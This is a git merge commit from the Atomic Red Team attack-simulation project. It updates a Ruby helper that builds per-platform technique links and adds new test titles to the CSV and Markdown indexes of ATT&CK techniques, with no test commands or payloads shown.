Merge branch 'master' into guid
This commit is contained in:
Carrie Roberts
@@ -47,21 +47,37 @@ class AtomicRedTeam
|
||||
#
|
||||
# Returns a Markdown formatted Github link to a technique. This will be to the edit page for
|
||||
# techniques that already have one or more Atomic Red Team tests, or the create page for
|
||||
# techniques that have no existing tests.
|
||||
# techniques that have no existing tests for the given OS.
|
||||
#
|
||||
def github_link_to_technique(technique, include_identifier: false, link_new_to_contrib: true)
|
||||
def github_link_to_technique(technique, include_identifier: false, only_platform: only_platform)
|
||||
technique_identifier = ATTACK_API.technique_identifier_for_technique(technique).upcase
|
||||
link_display = "#{"#{technique_identifier.upcase} " if include_identifier}#{technique['name']}"
|
||||
yaml_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.yaml"
|
||||
markdown_file = "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
|
||||
|
||||
if File.exists? "#{ATOMICS_DIRECTORY}/#{technique_identifier}/#{technique_identifier}.md"
|
||||
if atomic_yaml_has_test_for_platform(yaml_file, only_platform) && (File.exists? markdown_file)
|
||||
# we have a file for this technique, so link to it's Markdown file
|
||||
"[#{link_display}](../../#{technique_identifier}/#{technique_identifier}.md)"
|
||||
else
|
||||
# we don't have a file for this technique, so link to an edit page
|
||||
# we don't have a file for this technique, or there are not tests for the given platform, so link to an edit page
|
||||
"#{link_display} [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)"
|
||||
end
|
||||
end
|
||||
|
||||
def atomic_yaml_has_test_for_platform(yaml_file, only_platform)
|
||||
has_test_for_platform = false
|
||||
if File.exists? yaml_file
|
||||
yaml = YAML.load_file(yaml_file)
|
||||
yaml['atomic_tests'].each_with_index do |atomic, i|
|
||||
if atomic["supported_platforms"].any? {|platform| platform.downcase =~ only_platform}
|
||||
has_test_for_platform = true
|
||||
break
|
||||
end
|
||||
end
|
||||
end
|
||||
return has_test_for_platform
|
||||
end
|
||||
|
||||
def validate_atomic_yaml!(yaml, used_guids_file, unique_guid_array)
|
||||
raise("YAML file has no elements") if yaml.nil?
|
||||
|
||||
|
||||
File diff suppressed because one or more lines are too long
File diff suppressed because one or more lines are too long
@@ -13,6 +13,7 @@ persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute"
|
||||
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
|
||||
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
|
||||
persistence,T1176,Browser Extensions,3,Firefox
|
||||
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN
|
||||
persistence,T1042,Change Default File Association,1,Change Default File Association
|
||||
persistence,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER
|
||||
persistence,T1122,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER
|
||||
@@ -95,6 +96,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
|
||||
defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
|
||||
defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
|
||||
defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
|
||||
defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
|
||||
defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
|
||||
defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
|
||||
defense-evasion,T1146,Clear Command History,1,Clear Bash history (rm)
|
||||
@@ -223,6 +225,7 @@ defense-evasion,T1126,Network Share Connection Removal,3,Remove Network Share Po
|
||||
defense-evasion,T1027,Obfuscated Files or Information,1,Decode base64 Data into Script
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry
|
||||
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File
|
||||
defense-evasion,T1502,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell
|
||||
defense-evasion,T1150,Plist Modification,1,Plist Modification
|
||||
defense-evasion,T1093,Process Hollowing,1,Process Hollowing using PowerShell
|
||||
@@ -289,6 +292,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
|
||||
privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
|
||||
privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
|
||||
privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
|
||||
privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
|
||||
privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
|
||||
privilege-escalation,T1519,Emond,1,Persistance with Event Monitor - emond
|
||||
privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
|
||||
@@ -358,7 +362,8 @@ discovery,T1217,Browser Bookmark Discovery,1,List Mozilla Firefox Bookmark Datab
|
||||
discovery,T1217,Browser Bookmark Discovery,2,List Mozilla Firefox Bookmark Database Files on macOS
|
||||
discovery,T1217,Browser Bookmark Discovery,3,List Google Chrome Bookmark JSON Files on macOS
|
||||
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome Bookmarks on Windows with powershell
|
||||
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome Bookmarks on Windows with command prompt.
|
||||
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.
|
||||
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt.
|
||||
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery
|
||||
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest
|
||||
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests
|
||||
@@ -446,6 +451,7 @@ credential-access,T1003,Credential Dumping,13,GPP Passwords (findstr)
|
||||
credential-access,T1003,Credential Dumping,14,GPP Passwords (Get-GPPPassword)
|
||||
credential-access,T1003,Credential Dumping,15,LSASS read with pypykatz
|
||||
credential-access,T1003,Credential Dumping,16,Registry parse with pypykatz
|
||||
credential-access,T1003,Credential Dumping,17,Run Chrome-password Collector
|
||||
credential-access,T1081,Credentials in Files,1,Extract Browser and System credentials with LaZagne
|
||||
credential-access,T1081,Credentials in Files,2,Extract passwords with grep
|
||||
credential-access,T1081,Credentials in Files,3,Extracting passwords with findstr
|
||||
@@ -476,6 +482,7 @@ execution,T1223,Compiled HTML File,2,Compiled HTML Help Remote Payload
|
||||
execution,T1196,Control Panel Items,1,Control Panel Items
|
||||
execution,T1173,Dynamic Data Exchange,1,Execute Commands
|
||||
execution,T1173,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE
|
||||
execution,T1106,Execution through API,1,Execution through API - CreateProcess
|
||||
execution,T1118,InstallUtil,1,CheckIfInstallable method call
|
||||
execution,T1118,InstallUtil,2,InstallHelper method call
|
||||
execution,T1118,InstallUtil,3,InstallUtil class constructor method call
|
||||
@@ -601,7 +608,7 @@ collection,T1074,Data Staged,1,Stage data from Discovery.bat
|
||||
collection,T1074,Data Staged,2,Stage data from Discovery.sh
|
||||
collection,T1074,Data Staged,3,Zip a Folder with PowerShell for Staging in Temp
|
||||
collection,T1005,Data from Local System,1,Search macOS Safari Cookies
|
||||
collection,T1114,Email Collection,1,T1114 Email Collection with PowerShell
|
||||
collection,T1114,Email Collection,1,Email Collection with PowerShell Get-Inbox
|
||||
collection,T1056,Input Capture,1,Input Capture
|
||||
collection,T1113,Screen Capture,1,Screencapture
|
||||
collection,T1113,Screen Capture,2,Screencapture (silent)
|
||||
|
||||
|
@@ -4,6 +4,7 @@ persistence,T1156,.bash_profile and .bashrc,2,Add command to .bashrc
|
||||
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
|
||||
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
|
||||
persistence,T1176,Browser Extensions,3,Firefox
|
||||
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN
|
||||
persistence,T1136,Create Account,2,Create a user account on a MacOS system
|
||||
persistence,T1519,Emond,1,Persistance with Event Monitor - emond
|
||||
persistence,T1158,Hidden Files and Directories,1,Create a hidden file in a hidden directory
|
||||
|
||||
|
@@ -8,6 +8,7 @@ defense-evasion,T1088,Bypass User Account Control,3,Bypass UAC using Fodhelper
|
||||
defense-evasion,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
|
||||
defense-evasion,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
|
||||
defense-evasion,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
|
||||
defense-evasion,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
|
||||
defense-evasion,T1191,CMSTP,1,CMSTP Executing Remote Scriptlet
|
||||
defense-evasion,T1191,CMSTP,2,CMSTP Executing UAC Bypass
|
||||
defense-evasion,T1500,Compile After Delivery,1,Compile After Delivery using csc.exe
|
||||
@@ -89,6 +90,7 @@ defense-evasion,T1126,Network Share Connection Removal,2,Remove Network Share
|
||||
defense-evasion,T1126,Network Share Connection Removal,3,Remove Network Share PowerShell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,2,Execute base64-encoded PowerShell
|
||||
defense-evasion,T1027,Obfuscated Files or Information,3,Execute base64-encoded PowerShell from Windows Registry
|
||||
defense-evasion,T1027,Obfuscated Files or Information,4,Execution from Compressed File
|
||||
defense-evasion,T1502,Parent PID Spoofing,1,Parent PID Spoofing using PowerShell
|
||||
defense-evasion,T1093,Process Hollowing,1,Process Hollowing using PowerShell
|
||||
defense-evasion,T1055,Process Injection,1,Process Injection via mavinject.exe
|
||||
@@ -140,6 +142,7 @@ privilege-escalation,T1088,Bypass User Account Control,3,Bypass UAC using Fodhel
|
||||
privilege-escalation,T1088,Bypass User Account Control,4,Bypass UAC using Fodhelper - PowerShell
|
||||
privilege-escalation,T1088,Bypass User Account Control,5,Bypass UAC using ComputerDefaults (PowerShell)
|
||||
privilege-escalation,T1088,Bypass User Account Control,6,Bypass UAC by Mocking Trusted Directories
|
||||
privilege-escalation,T1088,Bypass User Account Control,7,Bypass UAC using sdclt DelegateExecute
|
||||
privilege-escalation,T1038,DLL Search Order Hijacking,1,DLL Search Order Hijacking - amsi.dll
|
||||
privilege-escalation,T1044,File System Permissions Weakness,1,File System Permissions Weakness
|
||||
privilege-escalation,T1179,Hooking,1,Hook PowerShell TLS Encrypt/Decrypt Messages
|
||||
@@ -170,6 +173,7 @@ persistence,T1197,BITS Jobs,3,"Persist, Download, & Execute"
|
||||
persistence,T1176,Browser Extensions,1,Chrome (Developer Mode)
|
||||
persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store)
|
||||
persistence,T1176,Browser Extensions,3,Firefox
|
||||
persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN
|
||||
persistence,T1042,Change Default File Association,1,Change Default File Association
|
||||
persistence,T1122,Component Object Model Hijacking,1,COM Hijack Leveraging user scope COR_PROFILER
|
||||
persistence,T1122,Component Object Model Hijacking,2,COM Hijack Leveraging System Scope COR_PROFILER
|
||||
@@ -235,7 +239,8 @@ discovery,T1087,Account Discovery,10,Enumerate logged on users via CMD
|
||||
discovery,T1087,Account Discovery,11,Enumerate logged on users via PowerShell
|
||||
discovery,T1010,Application Window Discovery,1,List Process Main Windows - C# .NET
|
||||
discovery,T1217,Browser Bookmark Discovery,4,List Google Chrome Bookmarks on Windows with powershell
|
||||
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome Bookmarks on Windows with command prompt.
|
||||
discovery,T1217,Browser Bookmark Discovery,5,List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt.
|
||||
discovery,T1217,Browser Bookmark Discovery,6,List Mozilla Firefox bookmarks on Windows with command prompt.
|
||||
discovery,T1482,Domain Trust Discovery,1,Windows - Discover domain trusts with dsquery
|
||||
discovery,T1482,Domain Trust Discovery,2,Windows - Discover domain trusts with nltest
|
||||
discovery,T1482,Domain Trust Discovery,3,Powershell enumerate domains and forests
|
||||
@@ -297,6 +302,7 @@ credential-access,T1003,Credential Dumping,13,GPP Passwords (findstr)
|
||||
credential-access,T1003,Credential Dumping,14,GPP Passwords (Get-GPPPassword)
|
||||
credential-access,T1003,Credential Dumping,15,LSASS read with pypykatz
|
||||
credential-access,T1003,Credential Dumping,16,Registry parse with pypykatz
|
||||
credential-access,T1003,Credential Dumping,17,Run Chrome-password Collector
|
||||
credential-access,T1081,Credentials in Files,3,Extracting passwords with findstr
|
||||
credential-access,T1081,Credentials in Files,4,Access unattend.xml
|
||||
credential-access,T1214,Credentials in Registry,1,Enumeration for Credentials in Registry
|
||||
@@ -342,7 +348,7 @@ collection,T1115,Clipboard Data,1,Utilize Clipboard to store or execute commands
|
||||
collection,T1115,Clipboard Data,2,PowerShell
|
||||
collection,T1074,Data Staged,1,Stage data from Discovery.bat
|
||||
collection,T1074,Data Staged,3,Zip a Folder with PowerShell for Staging in Temp
|
||||
collection,T1114,Email Collection,1,T1114 Email Collection with PowerShell
|
||||
collection,T1114,Email Collection,1,Email Collection with PowerShell Get-Inbox
|
||||
collection,T1056,Input Capture,1,Input Capture
|
||||
exfiltration,T1002,Data Compressed,1,Compress Data for Exfiltration With PowerShell
|
||||
exfiltration,T1002,Data Compressed,2,Compress Data for Exfiltration With Rar
|
||||
@@ -357,6 +363,7 @@ execution,T1223,Compiled HTML File,2,Compiled HTML Help Remote Payload
|
||||
execution,T1196,Control Panel Items,1,Control Panel Items
|
||||
execution,T1173,Dynamic Data Exchange,1,Execute Commands
|
||||
execution,T1173,Dynamic Data Exchange,2,Execute PowerShell script via Word DDE
|
||||
execution,T1106,Execution through API,1,Execution through API - CreateProcess
|
||||
execution,T1118,InstallUtil,1,CheckIfInstallable method call
|
||||
execution,T1118,InstallUtil,2,InstallHelper method call
|
||||
execution,T1118,InstallUtil,3,InstallUtil class constructor method call
|
||||
|
||||
|
@@ -24,6 +24,7 @@
|
||||
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
|
||||
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
|
||||
- Atomic Test #3: Firefox [linux, windows, macos]
|
||||
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
|
||||
- [T1042 Change Default File Association](../../T1042/T1042.md)
|
||||
- Atomic Test #1: Change Default File Association [windows]
|
||||
- T1109 Component Firmware [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -166,6 +167,7 @@
|
||||
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
|
||||
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
|
||||
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
|
||||
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
|
||||
- [T1191 CMSTP](../../T1191/T1191.md)
|
||||
- Atomic Test #1: CMSTP Executing Remote Scriptlet [windows]
|
||||
- Atomic Test #2: CMSTP Executing UAC Bypass [windows]
|
||||
@@ -335,6 +337,7 @@
|
||||
- Atomic Test #1: Decode base64 Data into Script [macos, linux]
|
||||
- Atomic Test #2: Execute base64-encoded PowerShell [windows]
|
||||
- Atomic Test #3: Execute base64-encoded PowerShell from Windows Registry [windows]
|
||||
- Atomic Test #4: Execution from Compressed File [windows]
|
||||
- [T1502 Parent PID Spoofing](../../T1502/T1502.md)
|
||||
- Atomic Test #1: Parent PID Spoofing using PowerShell [windows]
|
||||
- [T1150 Plist Modification](../../T1150/T1150.md)
|
||||
@@ -436,6 +439,7 @@
|
||||
- Atomic Test #4: Bypass UAC using Fodhelper - PowerShell [windows]
|
||||
- Atomic Test #5: Bypass UAC using ComputerDefaults (PowerShell) [windows]
|
||||
- Atomic Test #6: Bypass UAC by Mocking Trusted Directories [windows]
|
||||
- Atomic Test #7: Bypass UAC using sdclt DelegateExecute [windows]
|
||||
- [T1038 DLL Search Order Hijacking](../../T1038/T1038.md)
|
||||
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
|
||||
- T1157 Dylib Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -554,7 +558,8 @@
|
||||
- Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
|
||||
- Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
|
||||
- Atomic Test #4: List Google Chrome Bookmarks on Windows with powershell [windows]
|
||||
- Atomic Test #5: List Google Chrome Bookmarks on Windows with command prompt. [windows]
|
||||
- Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt. [windows]
|
||||
- Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt. [windows]
|
||||
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1526 Cloud Service Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
|
||||
@@ -671,6 +676,7 @@
|
||||
- Atomic Test #14: GPP Passwords (Get-GPPPassword) [windows]
|
||||
- Atomic Test #15: LSASS read with pypykatz [windows]
|
||||
- Atomic Test #16: Registry parse with pypykatz [windows]
|
||||
- Atomic Test #17: Run Chrome-password Collector [windows]
|
||||
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1081 Credentials in Files](../../T1081/T1081.md)
|
||||
- Atomic Test #1: Extract Browser and System credentials with LaZagne [macos]
|
||||
@@ -728,7 +734,8 @@
|
||||
- [T1173 Dynamic Data Exchange](../../T1173/T1173.md)
|
||||
- Atomic Test #1: Execute Commands [windows]
|
||||
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
|
||||
- T1106 Execution through API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1106 Execution through API](../../T1106/T1106.md)
|
||||
- Atomic Test #1: Execution through API - CreateProcess [windows]
|
||||
- T1129 Execution through Module Load [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -914,7 +921,7 @@
|
||||
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1114 Email Collection](../../T1114/T1114.md)
|
||||
- Atomic Test #1: T1114 Email Collection with PowerShell [windows]
|
||||
- Atomic Test #1: Email Collection with PowerShell Get-Inbox [windows]
|
||||
- [T1056 Input Capture](../../T1056/T1056.md)
|
||||
- Atomic Test #1: Input Capture [windows]
|
||||
- T1185 Man in the Browser [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
@@ -3,7 +3,7 @@
|
||||
- [T1156 .bash_profile and .bashrc](../../T1156/T1156.md)
|
||||
- Atomic Test #1: Add command to .bash_profile [macos, linux]
|
||||
- Atomic Test #2: Add command to .bashrc [macos, linux]
|
||||
- [T1098 Account Manipulation](../../T1098/T1098.md)
|
||||
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1067 Bootkit [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1176 Browser Extensions](../../T1176/T1176.md)
|
||||
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
|
||||
@@ -21,10 +21,10 @@
|
||||
- Atomic Test #1: Cron - Replace crontab with referenced file [macos, linux]
|
||||
- Atomic Test #2: Cron - Add script to cron folder [macos, linux]
|
||||
- Atomic Test #3: Event Monitor Daemon Persistence [macos, linux]
|
||||
- [T1137 Office Application Startup](../../T1137/T1137.md)
|
||||
- T1137 Office Application Startup [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1108 Redundant Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1505 Server Software Component](../../T1505/T1505.md)
|
||||
- T1505 Server Software Component [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1166 Setuid and Setgid](../../T1166/T1166.md)
|
||||
- Atomic Test #1: Make and modify binary from C source [macos, linux]
|
||||
- Atomic Test #2: Set a SetUID flag on file [macos, linux]
|
||||
@@ -34,10 +34,10 @@
|
||||
- [T1154 Trap](../../T1154/T1154.md)
|
||||
- Atomic Test #1: Trap [macos, linux]
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1100 Web Shell](../../T1100/T1100.md)
|
||||
- T1100 Web Shell [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# impact
|
||||
- [T1531 Account Access Removal](../../T1531/T1531.md)
|
||||
- T1531 Account Access Removal [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1485 Data Destruction](../../T1485/T1485.md)
|
||||
- Atomic Test #2: macOS/Linux - Overwrite file with DD [linux, macos]
|
||||
- T1486 Data Encrypted for Impact [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -46,7 +46,7 @@
|
||||
- T1487 Disk Structure Wipe [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1499 Endpoint Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1495 Firmware Corruption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1490 Inhibit System Recovery](../../T1490/T1490.md)
|
||||
- T1490 Inhibit System Recovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1498 Network Denial of Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1496 Resource Hijacking](../../T1496/T1496.md)
|
||||
- Atomic Test #1: macOS/Linux - Simulate CPU Load with Yes [macos, linux]
|
||||
@@ -96,7 +96,7 @@
|
||||
- [T1018 Remote System Discovery](../../T1018/T1018.md)
|
||||
- Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
|
||||
- Atomic Test #7: Remote System Discovery - sweep [linux, macos]
|
||||
- [T1518 Software Discovery](../../T1518/T1518.md)
|
||||
- T1518 Software Discovery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1082 System Information Discovery](../../T1082/T1082.md)
|
||||
- Atomic Test #3: List OS Information [linux, macos]
|
||||
- Atomic Test #4: Linux VM Check via Hardware [linux]
|
||||
@@ -110,17 +110,17 @@
|
||||
- Atomic Test #2: System Owner/User Discovery [linux, macos]
|
||||
|
||||
# credential-access
|
||||
- [T1098 Account Manipulation](../../T1098/T1098.md)
|
||||
- T1098 Account Manipulation [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1139 Bash History](../../T1139/T1139.md)
|
||||
- Atomic Test #1: Search Through Bash History [linux, macos]
|
||||
- [T1110 Brute Force](../../T1110/T1110.md)
|
||||
- T1110 Brute Force [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1522 Cloud Instance Metadata API [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1003 Credential Dumping](../../T1003/T1003.md)
|
||||
- T1003 Credential Dumping [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1503 Credentials from Web Browsers [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1081 Credentials in Files](../../T1081/T1081.md)
|
||||
- Atomic Test #2: Extract passwords with grep [macos, linux]
|
||||
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1056 Input Capture](../../T1056/T1056.md)
|
||||
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1040 Network Sniffing](../../T1040/T1040.md)
|
||||
- Atomic Test #1: Packet Capture Linux [linux]
|
||||
- [T1145 Private Keys](../../T1145/T1145.md)
|
||||
@@ -142,7 +142,7 @@
|
||||
- Atomic Test #4: Clear Bash history (ln dev/null) [linux, macos]
|
||||
- Atomic Test #5: Clear Bash history (truncate) [linux]
|
||||
- Atomic Test #6: Clear history of a bunch of shells [linux, macos]
|
||||
- [T1500 Compile After Delivery](../../T1500/T1500.md)
|
||||
- T1500 Compile After Delivery [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1090 Connection Proxy](../../T1090/T1090.md)
|
||||
- Atomic Test #1: Connection Proxy [macos, linux]
|
||||
- [T1089 Disabling Security Tools](../../T1089/T1089.md)
|
||||
@@ -196,7 +196,7 @@
|
||||
- Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
|
||||
- [T1064 Scripting](../../T1064/T1064.md)
|
||||
- Atomic Test #1: Create and Execute Bash Shell Script [macos, linux]
|
||||
- [T1151 Space after Filename](../../T1151/T1151.md)
|
||||
- T1151 Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1099 Timestomp](../../T1099/T1099.md)
|
||||
- Atomic Test #1: Set a file's access timestamp [linux, macos]
|
||||
- Atomic Test #2: Set a file's modification timestamp [linux, macos]
|
||||
@@ -204,7 +204,7 @@
|
||||
- Atomic Test #4: Modify file timestamps using reference file [linux, macos]
|
||||
- T1535 Unused/Unsupported Cloud Regions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1102 Web Service](../../T1102/T1102.md)
|
||||
- T1102 Web Service [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# lateral-movement
|
||||
@@ -225,18 +225,18 @@
|
||||
- T1506 Web Session Cookie [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# collection
|
||||
- [T1123 Audio Capture](../../T1123/T1123.md)
|
||||
- [T1119 Automated Collection](../../T1119/T1119.md)
|
||||
- [T1115 Clipboard Data](../../T1115/T1115.md)
|
||||
- T1123 Audio Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1119 Automated Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1115 Clipboard Data [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1074 Data Staged](../../T1074/T1074.md)
|
||||
- Atomic Test #2: Stage data from Discovery.sh [linux, macos]
|
||||
- T1530 Data from Cloud Storage Object [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1213 Data from Information Repositories [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1005 Data from Local System](../../T1005/T1005.md)
|
||||
- T1005 Data from Local System [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1039 Data from Network Shared Drive [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1025 Data from Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1114 Email Collection](../../T1114/T1114.md)
|
||||
- [T1056 Input Capture](../../T1056/T1056.md)
|
||||
- T1114 Email Collection [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1056 Input Capture [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1113 Screen Capture](../../T1113/T1113.md)
|
||||
- Atomic Test #3: X Windows Capture [linux]
|
||||
- Atomic Test #4: Import [linux]
|
||||
@@ -276,11 +276,11 @@
|
||||
- [T1153 Source](../../T1153/T1153.md)
|
||||
- Atomic Test #1: Execute Script using Source [macos, linux]
|
||||
- Atomic Test #2: Execute Script using Source Alias [macos, linux]
|
||||
- [T1151 Space after Filename](../../T1151/T1151.md)
|
||||
- T1151 Space after Filename [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1072 Third-party Software [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1154 Trap](../../T1154/T1154.md)
|
||||
- Atomic Test #1: Trap [macos, linux]
|
||||
- [T1204 User Execution](../../T1204/T1204.md)
|
||||
- T1204 User Execution [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
|
||||
# command-and-control
|
||||
- T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
@@ -300,7 +300,7 @@
|
||||
- T1026 Multiband Communication [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1079 Multilayer Encryption [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1219 Remote Access Tools](../../T1219/T1219.md)
|
||||
- T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
|
||||
- [T1105 Remote File Copy](../../T1105/T1105.md)
|
||||
- Atomic Test #1: rsync remote file copy (push) [linux, macos]
|
||||
- Atomic Test #2: rsync remote file copy (pull) [linux, macos]
|
||||
@@ -310,17 +310,17 @@
|
||||
- Atomic Test #6: sftp remote file copy (pull) [linux, macos]
|
||||
